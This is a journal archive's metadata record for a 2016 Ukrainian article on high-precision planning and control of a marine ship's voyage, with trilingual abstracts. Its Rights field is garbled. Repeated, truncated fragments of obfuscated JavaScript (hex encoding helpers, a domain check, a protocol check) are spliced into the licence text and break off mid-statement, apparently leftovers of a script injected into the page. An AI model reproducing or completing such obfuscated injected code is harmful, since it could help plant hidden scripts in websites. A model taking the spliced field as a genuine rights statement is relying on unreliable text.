Record Details

Система високоточного планування переходу морського судна

Наукові журнали Національного Авіаційного Університету

View Archive Info
 
 
Field Value
 
Title Система високоточного планування переходу морського судна
Система высокоточного планирования перехода морского судна
THE SYSTEM OF PRECISION PLANNING MARINE SHIP’S VOYAGE
 
Creator Sokolenko, Vasyliy; National University “Odessa Maritime Academy”, Ukraine
 
Subject
криволінійний рух; навігаційний комплекс; планування шляху; система; траєкторні точки; управління
656.61.052

криволинейное движение; навигационный комплекс; планирование пути; система; траекторные точки; управление
656.61.052

curvilinear motion; handling; navigation complex; path planning; trajectory point; system
656.61.052
 
Description У роботі розглянуто навігаційний комплекс планування шляху, який містить уперше запропоновані способи, методики розробки заданого алгоритму функціонування системи управління судном та контролю над процесом переміщення по траєкторіях руху, включаючи криволінійні ділянки. Наведено алгоритми контролю над процесом руху і способи високоточного контролю місця судна при управлінні. Створено автоматичні системи планування і контролю місця при криволінійному русі. Запропонована концепція дає новий напрям для забезпечення безпечного плавання суден у будь-яких умовах руху. Це дає можливість автоматизувати процес планування та управління судном при русі по траєкторіях довільної кривизни. Зазначені переваги досягаються за рахунок: розробки високоточних методів планування траєкторії руху, які враховують маневрені властивості судна; вдосконалення алгоритмів керування, котрі використовують системи підтримки прийняття рішення в режимі реального часу; використання автоматичного контролю відхилення центру ваги від заданого шляху високоточними способами; перерахунку високоточних координат місця супутникової антени визначення місця судна на центр ваги; використання високоточних способів розрахунку маневрених характеристик; візуалізації процесу руху і підвищення оперативності його коригування з єдиного пульту управління.Результати можуть бути використані на судах при створенні навігаційного пристрою плануванні переходу, в складі лоцманського індивідуального інформаційного пристрою і в тренажерах для підготовки судноводіїв до управління в умовах обмеженого простору.
В работе рассмотрен навигационный комплекс планирования пути, который содержит впервые предложенные способы, методики разработки заданного алгоритма функционирования системы управления судном и контроля над процессом перемещения по траекториям движения, включая криволинейные участки. Приведены алгоритмы контроля над процессом движения и способы высокоточного контроля места судна при управлении. Созданы автоматические системы планирования и контроля места при криволинейном движении. Предложенная концепция дает новое направление для обеспечения безопасного плавания судов в любых условиях движения. Это дает возможность автоматизировать процесс планирования и управления судном при движении по траекториям произвольной кривизны. Указанные преимущества достигаются за счет: разработки высокоточных способов планирования траектории движения, которые учитывают маневренные свойства судна; совершенствования алгоритмов управления, использующих системы поддержки принятия решения в режиме реального времени; использования автоматического контроля отклонения центра тяжести от заданного пути высокоточными способами; пересчета высокоточных координат места спутниковой антенны определения места судна на центр тяжести; использования высокоточных способов расчета маневренных характеристик; визуализации процесса движения и повышение оперативности корректировки движения с единого пульта управления. Результаты могут быть использованы на судах при создании навигационного устройства планировании перехода, в составе лоцманского индивидуального информационного устройства и в тренажерах для подготовки судоводителей к управлению в стесненных условиях.
The paper considers the navigational path planning complex, which includes new original methods of developing a given algorithm of ship handling system operation and control over the process of moving on motion paths, including curved portions. We propose the algorithms of control over the process of movement and precision control methods in the management of the ship's position. We created automatic place planning and control systems for curvilinear motion. The proposed concept gives a new direction to ensure the safe navigation of vessels in all driving conditions. This makes it possible to automate the process of planning and ship control when moving along the trajectories of arbitrary curvature. These benefits are achieved through: the development of high-precision methods of trajectory planning, which take into account the maneuvering characteristics of the vessel; improvement, using support systems control algorithms of decision-making in real-time; the use of automatic control of the center of gravity of the deviation from the set path precision methods; conversion of high-precision coordinate space satellite antenna on the determination of the vessel's center of gravity; the use of high-precision calculation methods maneuvering characteristics; visualization process of movement and improving the efficiency of adjustment movement with a single remote control. The results can be used on ships to create a navigation device transition planning, as part of the pilot of the individual information devices and simulators for training navigators to control in cramped conditions.
 
Publisher National Aviation University
 
Contributor


 
Date 2016-11-14
 
Type


 
Format application/pdf
application/pdf
application/pdf
 
Identifier http://jrnl.nau.edu.ua/index.php/visnik/article/view/10908
10.18372/2306-1472.68.10908
 
Source Proceedings of the National Aviation University; Том 68, № 3 (2016); 46-53
Вестник Национального авиационного университета; Том 68, № 3 (2016); 46-53
Вісник Національного Авіаційного Університету; Том 68, № 3 (2016); 46-53
 
Language en
 
Rights // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
Автори, які публікуються у цьому журналі, погоджуються з такими умовами:Автори залишають за собою право на авторство своєї роботи та передають журналу право першої публікації цієї роботи на умовах ліцензії Creative Commons Attribution License, котра дозволяє іншим особам вільно розповсюджувати опубліковану роботу з обов'язковим посиланням на авторів оригінальної роботи та першу публікацію роботи у цьому журналі.Автори мають право укладати самостійні додаткові угоди щодо неексклюзивного розповсюдження роботи у тому вигляді, в якому вона була опублікована цим журналом (наприклад, розміщувати роботу в електронному сховищі установи або публікувати у складі монографії), за умови збереження посилання на першу публікацію роботи у цьому журналі.Політика журналу дозволяє і заохочує розміщення авторами в мережі Інтернет (наприклад, у сховищах установ або на особистих веб-сайтах) рукопису роботи, як до подання цього рукопису до редакції, так і під час його редакційного опрацювання, оскільки це сприяє виникненню продуктивної наукової дискусії та позитивно позначається на оперативності та динаміці цитування опублікованої роботи (див. The Effect of Open Access).// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
 

Технічна підтримка: НДІІТТ НАУ